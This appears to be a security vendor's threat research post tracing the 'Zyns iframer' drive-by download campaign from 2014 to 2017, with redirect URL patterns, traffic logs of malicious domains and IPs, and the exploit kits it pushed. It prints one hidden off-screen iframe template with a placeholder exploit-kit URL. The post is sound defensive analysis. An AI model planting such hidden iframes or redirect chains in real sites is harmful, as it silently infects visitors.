We often get asked about drive-by download attacks, how they work, and specifically about what sites people may have visited just prior to getting infected. This is an interesting aspect when tracking campaigns and what they lead to.
Typically, one can divide the drive-by landscape into two categories: malvertising and compromised websites. The former involves legitimate websites that rely on advertising as their source of revenue. Crooks have long been able to insert themselves into the ad delivery chain in order to push malicious code such that the simple fact of viewing a page with ads actually infects your computer. The latter is made of websites that have been hacked and injected with malicious code and are also used to redirect users to malicious content.
What we refer to as “campaigns” are specific attributes from the same threat actor or group similar to what is used to categorize malware families. There are many different campaigns for both streams, some come and go while others stick around for long periods of time. For instance, EItest is one particular campaign for compromised sites which has been going on for years.
Campaigns are an essential part of the underground ecosystem because they continuously feed potential new victims into the infection funnel which ultimately translates into revenues for online criminals.
Today we are taking a look at an iframe campaign (Zyns iframer) that has been going on since at least 2014. There are specific indicators of compromise (IOCs) that haven’t really changed over time and the underlying structure has also remained pretty similar. We have seen this attack chain primarily associated with malvertising, and in particular via adult sites. During its course, we noted several different exploit kits being pushed by this campaign (Angler EK, Nuclear Pack, Neutrino EK, RIG EK).
The redirection infrastructure had very distinct patterns and also shared many of the same server IP addresses over time. We also saw the evolution from dynamic DNS (via sub domains) to domains on dubious top-level domains (TLDs).
/out.php?sid=1 /out.php?sid=3 /link.php /linkx.php
HTTP/1.1 200 OK Server: Apache/2.2.22 (@RELEASE@) X-Powered-By: PHP/5.3.3
<iframe src="[EK URL HERE]" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>
First spotted, 2014
Our earliest records are from the fall of 2014 with malvertising attacks mostly affecting Russian users. A capture from later that year shows a drive-by download from blogspot.ru via JetSwap, an “Active Promotion System!” where members and advertisers are linked together via an affiliate program. In this particular case, the advert loads a malicious iframe to qera.zyns.com which performs a 302 redirect to another domain qzertyu.myz.info and in turn redirects to the Angler exploit kit.
The campaign kept going as 2015 rolled in with an almost identical structure. Note the addition of ‘link.php’ to the domain in charge of loading iframes to EK. Angler wasn’t the only exploit kit used by these actors. For example we see Nuclear Pack below:
Sucuri Labs post shows another .wha.la domain involved in redirect:
A piece of code containing the same iframe redirection structure was posted in May 2015 to an online PHP editor. It shows a distinct URL pattern for the RIG exploit kit (RIG EK version 3).
2016 was an interesting year for exploit kits with the disappearance of Angler EK in June. The capture shown below is one of the latest artifacts we have from Angler EK before it went missing.
Payload: JuicyLemon (ransomware).
As we know, criminals transitioned to Neutrino EK after Angler EK went down. During the next few months, up until sometime in September there was a mix of both Neutrino EK and RIG EK used by the actors behind this campaign. Below, Neutrino EK in July:
The campaign was spotted in late June by Malekal (link) via malvertising on adult sites (with Gootkit mentioned as the payload).
Malware Traffic Analysis wrote a blog entry shortly after (link):
126.96.36.199 port 80 - glamgirltube.tk - GET /engine/classes/js/jquery.js - file with injected script 188.8.131.52 port 80 - fijir0.tk - GET /linkx.php - gate 184.108.40.206 port 80 - jy.neutralarbitrations.com - RIG EK
and in July Broad Analysis did too (link):
220.127.116.11 – relaxtube.tk – GET /engine/classes/js/jquery.js – Rig EK REDIRECT 18.104.22.168 – waferako.cf – GET /linkx.php – Rig EK REDIRECT 22.214.171.124 – ds.pacificbeachcar.com – Rig EK LANDING PAGE
RIG EK (also known as RIG Standard), seen in September:
In early December, we noticed a slight change with a new domain used as a redirector. At the same time, there were several instances where two different RIG EKs were pushed from the same redirection chain, leading to two different malware payloads.
In January we started seeing the same redirector that had been pushing this campaign switch to a different chain, this time via compromised sites. This was interesting because throughout December, we were seeing the usual sequence of events with the standard iframe, even though this chain came via a different sid (sid 3) than the typical sid 1.
December 2016 (with sid=3)
Come January and we have a completely new pattern where an iframe is now inserted via a double chain of events, most notably malicious code injection that looked new to me within a WordPress plugin called Contact Form 7.
January 2017 (also with sid=3)
The end of the road?
In January, several different trails we were tracking began to disappear, showing that the Zyns iframer campaign was likely evolving or got merged into something else. The diversity of payloads and exploit kits may indicate there was no particular tie with any specific malware distributor.
Threat actors will buy traffic from various sources to push malware, with malvertising often being the top choice for its wide impact. This particular case is a mix of malvertising and bogus adult websites aimed at driving a lot of users into exploit kit landing pages.
To protect yourself against drive-by download attacks, the first thing to do is to ensure that your computer is fully up-to-date. Use Malwarebytes to stay safe from malicious websites and thwart exploits (known and unknown) before they launch their payload.
Thanks to @hasherezade for help with payload identification!